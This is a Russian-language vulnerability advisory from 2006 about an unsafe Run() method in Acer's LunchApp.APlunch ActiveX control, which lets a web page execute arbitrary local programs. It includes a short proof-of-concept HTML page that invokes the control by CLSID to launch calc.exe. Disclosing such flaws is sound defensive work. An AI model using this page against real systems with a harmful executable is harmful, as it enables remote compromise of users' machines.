Небезопасное использование метода "Run()" в Acer LunchApp.APlunch ActiveX компоненте

Дата публикации:
21.11.2006
Всего просмотров:
1172
Опасность:
Высокая
Наличие исправления:
Инстуркции по устранению
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Acer LunchApp.APlunch ActiveX Control 1.x
Уязвимые версии: Acer LunchApp.APlunch ActiveX 1.0.0.0, возможно более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за того, что приложение использует небезопасный метод "Run()", который выполняет произвольные файлы, переданные ему в качестве аргумента. Удаленный пользователь может с помощью специально сформированной Web страницы выполнить произвольные локальные приложения не целевой системе. Пример:

<html>
	<body>
		<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
		</object>
		<script>
			hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
		</script>
	</body>		
</html>

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: About Acer Notebook LunchApp.APlunch ActiveX Control....

или введите имя

CAPTCHA